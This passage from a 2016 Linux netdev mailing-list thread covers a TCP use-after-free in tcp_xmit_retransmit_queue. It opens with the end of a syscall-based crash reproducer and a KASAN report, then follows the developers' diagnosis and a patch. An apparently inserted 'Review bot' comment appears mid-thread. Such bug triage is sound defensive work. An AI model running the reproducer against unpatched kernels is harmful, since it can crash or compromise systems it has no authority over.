 xe6\x1a\x8c\x0d\x95\xdf\xe2\xc2\xd4\x5c\x85\x6d\x79\x3b\x8a\x6c\x51\xf3\x5f\x06\xdf\x07\x5b\x69\x8a\xde\x75\x59\x6d\x70\x99\x55\x09\x8f\xf8\xc0\x6f\x2e\xc3\x0f\x87\x1c\x79\xe8\x4b\xb0\x55\x51\xb2\xa3\x91\x9b\xb0\x89\x17\xad\x9b\x89\x81\x23\x12\xcb\x45\x8a\xd7\x2a\x0a\x19\x84\x7d\xb9\x64\xa6\x31\xa3\x48\x30\x3c\x01\x6b\x7c\x74\x20\xe6\x0b\xff\x2a\x0a\x66\x82\x00\x31\x01\xbc\xf8\x47\x02\xcc\x43\xbe\x6d\x0c\x0e\x4f\x59\x37\x4d\xcb\xc2\x37\xee\x5e\x1c\x2c\xf3\xda\xc8\xf8\xc9\x8c\xbc\xff\xd9\x8b\x8a\xee\x4e\xab\x19\x8f\xb6\xb4\xe7\x0a\xda\x9c\x5c\x00\xc3\x26\x87\x63\xb0\xa9\x1b\x31\x62\xef\x04\x10\x68\x6c\x3c\xd1\xba\x73\xc1\xaa\xf2\xe4\xbd\x29\xdb\x2c\xe3\x69\xf0\x34\x8d\xd3\x6b\x6e\x59\x42\x6f\x28\x3d\x2f\x83\x27\x48\xc0\xb7\x82\xd3\x95\x96\x0c\xdf\x22\xc7\xce\x77\xab\x09\x4c\xad\xab\x0d\x7
 0\xee\x4d\xea\xb3\x63\x62\x04\x6f\xd7\x68\x2e\x86\x7c\xac\xd4\xc2\x6e\x09\xdf\xf0\xbe\x8c\x71\xd9\xa8\x82\xf8\xd2\x14\x70\xb7\xd0\x40\x12\x5e\xa7\xec\xab\x1a\x13\x87\x0b\x6e\x28\x59\x76\x01\xb2\x3f\x64\x62\x35\xb3\xff\x0d\x8a\x3d\x6b\x5a\xd3\x9e\x59\x14\x6d\x19\x4c\x99\x04\x75\xe4\x04\xe3\xf2\x8a\x19\x77\x06\xdd\x5f\x2e\x25\x2c\xa3\xb5\x52\xa6\xfa\x2b\x84\x35\xdc\x56\x55\x02\x63\x79\x81\x3b\x27\x82\x41\x92\x19\xb3\xe3\x63\xce\xb5\x0c\x1a\x15\x15\x38\x2a\x52\xf0\xdd\x58\x3d\xa4\x7f\x5b\xb9\xa3\x9c\x90\x14\xf9\x2c\x2b\xaa\x1e\x0d\xfd\xf6\x93\x7e\xbc\xc3\x59\x11\x6e\xd9\x52\x1e\xd0\xea\x0b\x55\x0b\x71\xfa\x69\xda\x9d\x35\x10\x70\x32\x68\xe8\xde\x47\x74\x1f\xc6\x60\x86\xbd\x15\x1c\x6b\x52\xeb\xe4\x04\x0f\x8c\x70\x2f\x8d\x6d\x7e\x5f\xfd\xe7\xd1\x87\x80\x76\xd8\x7a\x2c\xbf\xb2\x98\x12\x83\x81\
 x94\x11\x7d\x1c\x90\xfd\xf0\xdc\xe6\x9d\xee\x76\xde\x50\xcb\x97\x25\xca\x88\xd8\x70\x97\x40\x25\x94\xc5\xfe\x8b\x44\x05\x8d\x6e\x7f\xab\xc3\x27\xd8\x0e\x4a\x30\xb5\xfb\x95\xf8\x34\x75\x01\x1f\xe6\xac\x81\x1b\x13\x63\xb7\x60\xb8\x1c\x3b\xda\x07\x26\x9e\xfd\xeb\x7f\x43\x46\x93\x75\x63\xdc\xa7\xe9\xc1\x8f\xa9\x06\x96\xe7\x10\x87\xb4\x32\x4a\x30\x69\xd2\xf4\x2b\x5d\x76\xa3\x94\x6b\x72\xd9\xc6\xfa\x6a\x49\x12\xc7\xc2\x74\x3f\xc4\x39\x9f\xa0\x7e\xcd\x81\x9c\x54\x0f\x14\xce\xd3\x7e\xd8\xe8\xd2\xc2\x24\x2e\xc5\x1b\x58\xf8\x8e\xe6\xaa\x16\x69\x6c\x4b\x40\x86\x1a\x1a\xad\x11\x6f\x90\x48\x68\x93\xb1\x8f\xbd\xaf\x8d\x00\x09\x5e\xf4\xe3\x03\x59\xff\x8f\xf5\xf0\xe2\xa1\x79\x93\xf5\x76\xcb\x56\x93\xb8\xe6\x22\xe5\x69\x90\x3d\x0f\x9b\x57\x86\x19\xf7\x63\xd5\x2c\xfe\xad\x63\x60\x9e\x9e\x29\x04\xe9\x4d\xb
 6\xd9\xb1\xdb\x42\x2d\x8b\x8d\x6d\xdd\xae\x0b\xca\x58\x38\xf4\x30\xad\xae\xa3\x3d\x64\x47\xe0\x77\xc3\xed\xc8\xe0\x7d\x3c\x6c\xda\xbd\x47\x5e\x37\xb4\xe4\xb8\x1c\x69\x16\xb6\xd5\x8b\x9a\x15\xfa\x6b\x21\x88\x74\xbb\xdf\xe3\xbe\x31\x02\x8e\x82\x81\x10\x98\x24\x74\x04\xad\xe3\xc5\x63\x57\x0d\x58\xbe\x1c\x97\xa1\x0d\xb6\x55\x83\x18\x41\x37\xa7\x1b\x51\x37\x13\x99\xeb\x6f\xe3\x70\xc2\x4a\x8c\x17\xc6\x30\x8d\x01\xfe\xd4\x71\x4c\xee\x82\x94\xe4\x1d\x9a\x8a\xed\x48\x61\xba\x6c\x63\x5f\x3b\x13\x9f\x5b\xe4\x0b\x2c\x44\x1c\xb7\xf6\xc7\x64\xf6\x74\x4a\x16\x7a\x35\xf7\x2e\x9d\x4f\x00\x38\xa7\xad\xe7\x17\x0c\xb7\x3f\x02\x41\xe9\xa3\x37\x5b\x98\xd5\x0f\xc6\xe6\xd1\x38\x4e\x87\x4f\x2f\x02\xa1\x27\x4d\xb2\x03\xfc\x50\x48\xaa\x33\x92\xe1\x10\xa6\x0b\xb0\x20\x7c\x57\xd4\x85\x55\x51\x6e\x7e\xdf\xa2\x46\xf5\
 x94\x93\x03\x02\xdb\x94\x55\x23\xd9\x5b\x99\x2b\x3a\x7e\x7d\xb1\x80\x47\xf9\x77\xee\x0f\x5e\x63\x7f\x1e\x96\xdf\xf9\x1c\x81\x55\xdd\x02\x81\x87\xc8\x04\x52\x59\x49\xd4\x08\xd5\x73\x43\x3f\xd2\xf9\xa9\xf0\xd7\xb9\x97\x86\x9c\x0a\xc6\x7d\x5a\x98\x88\x2b\x0b\x38\xa1\xcb\xf8\x71\xc7\x5d\xfe\xba\xd0\x26\x4b\xdf\xb8\x11\x8f\x71\x60\x68\xc7\x82\xd0\x36\x97\x23\x56\xda\x52\x58\x90\x0a\x42\x0b\xfc\xf8\xc9\x1f\x36\x7f\x9f\xe5\x5b\xf8\x6e\xe1\x78\x47\xfe\x6b\x00\xcd\xe5\x6b\xe2\xa6\xaf\x2b\x33\x95\x73\x79\x52\x13\x1c\x87\x3d\x8d\xbc\x32\x1e\x11\x25\x91\x51\xa0\xaf\xcc\xf1\xc3\x5a\xea\x8b\x15\x82\x76\xa9\x0f\xe7\x08\x73\x53\x02\x4c\x8c\xb2\x8d\x4b\xa0\xed\x37\x20\x7f\x54\xa2\x2a\x33\x6b\x5f\x3a\x4f\x54\x61\x85\x91\x86\x68\x5a\xd4\x80\xc9\x21\xa9\x16\x5d\x77\xee\x28\xeb\xc2\x5c\x22\xe4\x27\xdb\x5b\xe
 4\xa7\x70\xdc\x6a\x8e\xd9\xe7\x77\x09\x5b\x94\x97\xc6\xf4\x1f\x7a\x35\x9e\x26\x1e\x8b\x37\xe3\xa4\xdc\x0a\x8a\x19\x59\x3a\x77\x81\x2d\x9b\x0e\x51\x2b\xd7\xc5\xbc\x07\xfa\xf3\x29\x79\x35\x98\xe3\xb8\xf7\xe5\x40\xdf\xa8\x93\x00\xf6\x53\x8c\xcc\x33\xdf\x0e\x35\x3e\x72\x8d\x48\x85\x05\x40\x43\xe1\x13\xd6\x4a\x95\x50\xf8\x32\xca\xc3\x1c\x28\xd4\x41\x15\x64\xc1\x08\xfb\x2c\xc2\x1f\x79\x30\x58\xaa\x7c\x0d\x83\x8e\x87\xf4\x2e\xa3\xfc\xeb\xd0\xdb\xcc\x15\xcd\x88\x99\x41\x75\x13\xc1\x0c\x53\x96\xfe\xff\xeb\x87\x6a\x04\x75\xf2\x98\x40\x7e\xc7\x4e\x47\x63\x31\x2f\xb2\xa2\x88\x30\xca\x49\xfb\x57\x40\x65\x8c\xc9\x80\x20\xb9\xc9\xfc\x79\x12\x8d\xe6\x24\x24\x5f\x38\x47\x3c\x93\x64\x41\x9a\xf2\xe8\xab\xc1\xaf\x13\x95\x5c\x26\x4e\x02\x99\x5f\x6a\xe3\xd4\x91\x0a\xf5\x06\x3a\x2d\xc9\x22\x96\x6b\xa0\x77\x00\
 x77\x7c\x26\xdc\xb6\xc1\x1b\x6c\xc8\xfe\x43\x2c\xe2\xdc\x58\x7e\x30\x38\x98\x97\xdf\xda\xae\x9d\x40\x94\xb7\x16\x91\x66\x94\x6c\x2a\x50\x39\x69\xce\xb4\x5c\xec\x2e\x60\x71\x92\xa3\x14\x1f\x08\x70\xcb\x9c\x47\x5b\xf3\xf4\xea\x7a\x34\x43\x32\x8b\x19\x57\xd2\xe7\x1c\xc5\xeb\xa5\x66\x37\x73\x80\x59\xac\x1e\xc0\x2f\xf1\x30\xf4\xd0\xc7\x78\x2b\x38\xd3\xab\x74\xfd\x4d\xdf\x5e\xc5\xa7\x89\x1b\xb7\x76\xf5\xf9\xfd\xca\xfc\xc2\x0d",
4096);
r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul,
0x0ul);
r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
// 0x28 bytes at 0x20022fdd for the final write(); this is the write() path
// that the KASAN "Allocated"/"Freed" stacks below attribute to tcp_sendmsg.
*(uint32_t*)0x20022fdd = (uint32_t)0x28;
*(uint32_t*)0x20022fe1 = (uint32_t)0x400;
*(uint64_t*)0x20022fe5 = (uint64_t)0x0;
*(uint64_t*)0x20022fed = (uint64_t)0x8ab;
*(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb;
*(uint16_t*)0x20022ffd = (uint16_t)0x5;
r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0);
// No exit here: the child continues the while(1) loop and forks again.
} else if (pid > 0) {
// --- parent: block until this child is gone, then start another ---
int returnStatus;
            waitpid(pid, &returnStatus, 0);
            printf("collected child\n");
} else {
// fork() failed; nothing to clean up, so stop the whole run.
printf("fork failed\n");
exit(1);
}
}
return 0;
}


// KASAN report on v4.8-rc1, equivalent on master

/*
[   21.446876] BUG: KASAN: use-after-free in
tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428
[   21.447953] Read of size 4 by task rsyslogd/1612
[   21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G    B
4.8.0-rc1 #1
[   21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   21.450270]  0000000000000000 0000000015e55fbd ffff88007dc07268
ffffffff81bef151
[   21.451135]  ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8
ffff88007a06d400
[   21.452002]  ffff88007dc07290 ffffffff815d0351 ffff88007dc07328
ffff88007a06d400
[   21.452873] Call Trace:
[   21.453142]  <IRQ>  [<ffffffff81bef151>] dump_stack+0x83/0xb2
[   21.453835]  [<ffffffff815d0351>] kasan_object_err+0x21/0x70
[   21.454450]  [<ffffffff815d05f4>] kasan_report_error+0x204/0x500
[   21.455135]  [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70
[   21.455899]  [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0
[   21.456624]  [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0
[   21.457329]  [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120
[   21.458028]  [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0
[   21.458590]  [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0
[   21.459189]  [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0
[   21.459804]  [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0
[   21.460540]  [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20
[   21.461237]  [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0
[   21.461865]  [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210
[   21.462581]  [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0
[   21.463167]  [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0
[   21.463884]  [<ffffffff815cfaa5>] ? memcpy+0x45/0x50
[   21.464414]  [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0
[   21.465057]  [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240
[   21.465719]  [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0
[   21.466326]  [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0
[   21.466954]  [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120
[   21.467591]  [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410
[   21.468231]  [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0
[   21.468836]  [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550
[   21.469462]  [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0
[   21.470179]  [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0
[   21.470953]  [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50
[   21.471600]  [<ffffffff82b8396a>] ip6_input+0xda/0x1f0
[   21.472149]  [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90
[   21.472870]  [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50
[   21.473521]  [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0
[   21.474210]  [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0
[   21.474858]  [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340
[   21.475487]  [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750
[   21.476043]  [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[   21.476615]  [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20
[   21.477332]  [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50
[   21.478956]  [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500
[   21.479618]  [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[   21.480250]  [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0
[   21.481017]  [<ffffffff812092c0>] ? update_curr+0x150/0x4e0
[   21.481700]  [<ffffffff82937c90>] ? netdev_info+0x120/0x120
[   21.482339]  [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280
[   21.482969]  [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350
[   21.483619]  [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420
[   21.484295]  [<ffffffff810fddf1>] ?
__x2apic_send_IPI_dest.constprop.4+0x31/0x40
[   21.485101]  [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0
[   21.485739]  [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170
[   21.486383]  [<ffffffff8293e1a7>] process_backlog+0x197/0x580
[   21.487021]  [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0
[   21.487615]  [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0
[   21.488258]  [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20
[   21.488909]  [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110
[   21.489471]  [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30
[   21.490147]  [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340
[   21.490868]  [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d
[   21.491470]  [<ffffffff811769d7>] irq_exit+0x117/0x140
[   21.492035]  [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0
[   21.492712]  [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90
[   21.493378]  <EOI> Object at ffff88007a06d400, in cache
skbuff_fclone_cache size: 424
[   21.494277] Allocated:
[   21.494538] PID = 1711
[   21.494801]  [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[   21.495416]  [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[   21.495970]  [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0
[   21.496572]  [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20
[   21.497185]  [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0
[   21.497853]  [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0
[   21.498475]  [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790
[   21.499129]  [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10
[   21.499754]  [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[   21.500371]  [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[   21.500988]  [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[   21.501625]  [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[   21.502249]  [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[   21.502838]  [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[   21.503429]  [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   21.504144] Freed:
[   21.504368] PID = 1711
[   21.504628]  [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[   21.505290]  [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[   21.505879]  [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0
[   21.506501]  [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210
[   21.507128]  [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0
[   21.507752]  [<ffffffff828f3e22>] __kfree_skb+0x22/0x30
[   21.508339]  [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10
[   21.508962]  [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[   21.509574]  [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[   21.510194]  [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[   21.510818]  [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[   21.511408]  [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[   21.512003]  [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[   21.512562]  [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   21.513258] Memory state around the buggy address:
[   21.513770]  ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00
[   21.514546]  ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc
fc fc
[   21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb
fb fb
[   21.516114]                                   ^
[   21.516611]  ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb
fb fb
[   21.517400]  ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb
fb fb
[   21.518203]
==================================================================
*/

----- End forwarded message -----


* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
  2016-08-16 10:45 Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master] Greg KH
@ 2016-08-16 15:39 ` Eric Dumazet
  2016-08-16 18:39   ` Eric Dumazet
  0 siblings, 1 reply; 12+ messages in thread
From: Eric Dumazet @ 2016-08-16 15:39 UTC (permalink / raw)
  To: Greg KH; +Cc: netdev, Marco Grassi

On Tue, 2016-08-16 at 12:45 +0200, Greg KH wrote:
> For some reason Marco's emails can't make it to netdev, so I'm
> forwarding this on.  Please cc: him on responses.

Thanks for the report Greg and Marco.

My first guess is this is caused by 

d41a69f1d390 tcp: make tcp_sendmsg() aware of socket backlog

And a combination of funky sendmsg() flags (like FastOpen)

I will look at this problem today.


* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
  2016-08-16 15:39 ` Eric Dumazet
@ 2016-08-16 18:39   ` Eric Dumazet
  2016-08-16 20:19     ` Cong Wang
  2016-08-17 12:56     ` [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue() Eric Dumazet
  0 siblings, 2 replies; 12+ messages in thread
From: Eric Dumazet @ 2016-08-16 18:39 UTC (permalink / raw)
  To: Greg KH; +Cc: netdev, Marco Grassi, Yuchung Cheng, Neal Cardwell

On Tue, 2016-08-16 at 08:39 -0700, Eric Dumazet wrote:
> On Tue, 2016-08-16 at 12:45 +0200, Greg KH wrote:
> > For some reason Marco's emails can't make it to netdev, so I'm
> > forwarding this on.  Please cc: him on responses.
> 
> Thanks for the report Greg and Marco.
> 
> My first guess is this is caused by 
> 
> d41a69f1d390 tcp: make tcp_sendmsg() aware of socket backlog
> 
> And a combination of funky sendmsg() flags (like FastOpen)
> 
> I will look at this problem today.
> 

No, above commit was innocent ;)

It looks like the bug is very old, and the following patch would fix it.
I will submit it formally after a few tests.


diff --git a/include/net/tcp.h b/include/net/tcp.h
index c00e7d51bb18..7717302cab91 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -1523,6 +1523,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
 {
 	if (sk->sk_send_head == skb_unlinked)
 		sk->sk_send_head = NULL;
+	if (tcp_sk(sk)->highest_sack == skb_unlinked)
+		tcp_sk(sk)->highest_sack = NULL;
 }
 
 static inline void tcp_init_send_head(struct sock *sk)
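Review bot: The reset is placed in tcp_check_send_head(), so it only protects unlink sites that call that helper; tcp_unlink_write_queue() is a separate call (the do_fault path quoted later in this thread invokes both back to back), and any other path that unlinks and frees a write-queue skb without going through tcp_check_send_head() would keep the same dangling tp->highest_sack. Which other callers exist is not visible here, so that is worth a grep before the formal submission. A comment on the two new lines would also make the pairing with the setter obvious, e.g. `/* tcp_add_write_queue_tail() may have pointed highest_sack at this skb */`. tcp_check_send_head()'s signature appears only in the hunk header; its body is fully inside the hunk.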


* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
From: Cong Wang @ 2016-08-16 20:19 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Greg KH, Linux Kernel Network Developers, Marco Grassi,
	Yuchung Cheng, Neal Cardwell

On Tue, Aug 16, 2016 at 11:39 AM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> On Tue, 2016-08-16 at 08:39 -0700, Eric Dumazet wrote:
>> On Tue, 2016-08-16 at 12:45 +0200, Greg KH wrote:
>> > For some reason Marco's emails can't make it to netdev, so I'm
>> > forwarding this on.  Please cc: him on responses.
>>
>> Thanks for the report Greg and Marco.
>>
>> My first guess is this is caused by
>>
>> d41a69f1d390 tcp: make tcp_sendmsg() aware of socket backlog
>>
>> And a combination of funky sendmsg() flags (like FastOpen)
>>
>> I will look at this problem today.
>>
>
> No, above commit was innocent ;)
>
> It looks like the bug is very old, and following patch would fix it.
> I will submit it formally after few tests.
>
>
> diff --git a/include/net/tcp.h b/include/net/tcp.h
> index c00e7d51bb18..7717302cab91 100644
> --- a/include/net/tcp.h
> +++ b/include/net/tcp.h
> @@ -1523,6 +1523,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
>  {
>         if (sk->sk_send_head == skb_unlinked)
>                 sk->sk_send_head = NULL;
> +       if (tcp_sk(sk)->highest_sack == skb_unlinked)
> +               tcp_sk(sk)->highest_sack = NULL;
>  }

Hmm, but from the stack traces it indicates the skb is freed
inside tcp_sendmsg(), which must be:


do_fault:
        if (!skb->len) {
                tcp_unlink_write_queue(skb, sk);
                /* It is the one place in all of TCP, except connection
                 * reset, where we can be unlinking the send_head.
                 */
                tcp_check_send_head(sk, skb);
                sk_wmem_free_skb(sk, skb);
        }

In this case, skb->len == 0 means it is newly allocated skb by
sk_stream_alloc_skb(), so it should not have a chance to be
picked by tp->highest_sack yet b/c the whole function locks
the sock?

I must miss something here.


* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
From: Eric Dumazet @ 2016-08-16 20:27 UTC (permalink / raw)
  To: Cong Wang
  Cc: Greg KH, Linux Kernel Network Developers, Marco Grassi,
	Yuchung Cheng, Neal Cardwell

On Tue, 2016-08-16 at 13:19 -0700, Cong Wang wrote:
> On Tue, Aug 16, 2016 at 11:39 AM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> > On Tue, 2016-08-16 at 08:39 -0700, Eric Dumazet wrote:
> >> On Tue, 2016-08-16 at 12:45 +0200, Greg KH wrote:
> >> > For some reason Marco's emails can't make it to netdev, so I'm
> >> > forwarding this on.  Please cc: him on responses.
> >>
> >> Thanks for the report Greg and Marco.
> >>
> >> My first guess is this is caused by
> >>
> >> d41a69f1d390 tcp: make tcp_sendmsg() aware of socket backlog
> >>
> >> And a combination of funky sendmsg() flags (like FastOpen)
> >>
> >> I will look at this problem today.
> >>
> >
> > No, above commit was innocent ;)
> >
> > It looks like the bug is very old, and following patch would fix it.
> > I will submit it formally after few tests.
> >
> >
> > diff --git a/include/net/tcp.h b/include/net/tcp.h
> > index c00e7d51bb18..7717302cab91 100644
> > --- a/include/net/tcp.h
> > +++ b/include/net/tcp.h
> > @@ -1523,6 +1523,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
> >  {
> >         if (sk->sk_send_head == skb_unlinked)
> >                 sk->sk_send_head = NULL;
> > +       if (tcp_sk(sk)->highest_sack == skb_unlinked)
> > +               tcp_sk(sk)->highest_sack = NULL;
> >  }
> 
> Hmm, but from the stack traces it indicates the skb is freed
> inside tcp_sendmsg(), which must be:
> 
> 
> do_fault:
>         if (!skb->len) {
>                 tcp_unlink_write_queue(skb, sk);
>                 /* It is the one place in all of TCP, except connection
>                  * reset, where we can be unlinking the send_head.
>                  */
>                 tcp_check_send_head(sk, skb);
>                 sk_wmem_free_skb(sk, skb);
>         }
> 
> In this case, skb->len == 0 means it is newly allocated skb by
> sk_stream_alloc_skb(), so it should not have a chance to be
> picked by tp->highest_sack yet b/c the whole function locks
> the sock?
> 
> I must miss something here.


Look at skb_entail() : It calls tcp_add_write_queue_tail()

And tcp_add_write_queue_tail() looks like :


/*
 * Append @skb to the socket write queue. If nothing was pending
 * (sk_send_head == NULL) this skb becomes the new send head, and if
 * tp->highest_sack was also unset it is pointed at the very same skb.
 */
static inline void tcp_add_write_queue_tail(struct sock *sk, struct sk_buff *skb)
{
        __tcp_add_write_queue_tail(sk, skb);

        /* Queue it, remembering where we must start sending. */
        if (sk->sk_send_head == NULL) {
                sk->sk_send_head = skb;

                /* Only taken when no SACK bookkeeping exists yet. Whoever
                 * later unlinks and frees this skb must reset both
                 * pointers, otherwise highest_sack is left dangling. */
                if (tcp_sk(sk)->highest_sack == NULL)
                        tcp_sk(sk)->highest_sack = skb;
        }
}


So we definitely need to undo what tcp_add_write_queue_tail() did.


* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
From: Eric Dumazet @ 2016-08-16 20:31 UTC (permalink / raw)
  To: Cong Wang
  Cc: Greg KH, Linux Kernel Network Developers, Marco Grassi,
	Yuchung Cheng, Neal Cardwell

On Tue, 2016-08-16 at 13:27 -0700, Eric Dumazet wrote:

> 
> Look at skb_entail() : It calls tcp_add_write_queue_tail()
> 
> And tcp_add_write_queue_tail() looks like :
> 
> 
> static inline void tcp_add_write_queue_tail(struct sock *sk, struct sk_buff *skb)
> {
>         __tcp_add_write_queue_tail(sk, skb);
> 
>         /* Queue it, remembering where we must start sending. */
>         if (sk->sk_send_head == NULL) {
>                 sk->sk_send_head = skb;
> 
>                 if (tcp_sk(sk)->highest_sack == NULL)
>                         tcp_sk(sk)->highest_sack = skb;
>         }
> }
> 
> 
> So we definitely need to undo what tcp_add_write_queue_tail() did.

So the bug was probably added in 2.6.25 

commit 6859d49475d4f32abe640372117e4b687906e6b6
Author: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Date:   Sun Dec 2 00:48:06 2007 +0200

    [TCP]: Abstract tp->highest_sack accessing & point to next skb
    
    Pointing to the next skb is necessary to avoid referencing
    already SACKed skbs which will soon be on a separate list.
    
    Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
    Signed-off-by: David S. Miller <davem@davemloft.net>


* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
From: Cong Wang @ 2016-08-16 20:32 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Greg KH, Linux Kernel Network Developers, Marco Grassi,
	Yuchung Cheng, Neal Cardwell

On Tue, Aug 16, 2016 at 1:27 PM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> And tcp_add_write_queue_tail() looks like :
>
>
> static inline void tcp_add_write_queue_tail(struct sock *sk, struct sk_buff *skb)
> {
>         __tcp_add_write_queue_tail(sk, skb);
>
>         /* Queue it, remembering where we must start sending. */
>         if (sk->sk_send_head == NULL) {
>                 sk->sk_send_head = skb;
>
>                 if (tcp_sk(sk)->highest_sack == NULL)
>                         tcp_sk(sk)->highest_sack = skb;
>         }
> }
>

Ah, I never looked into tcp_add_write_queue_tail()...

So this bug seems exist after commit 6859d49475d4f32abe640372117e4b...


* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
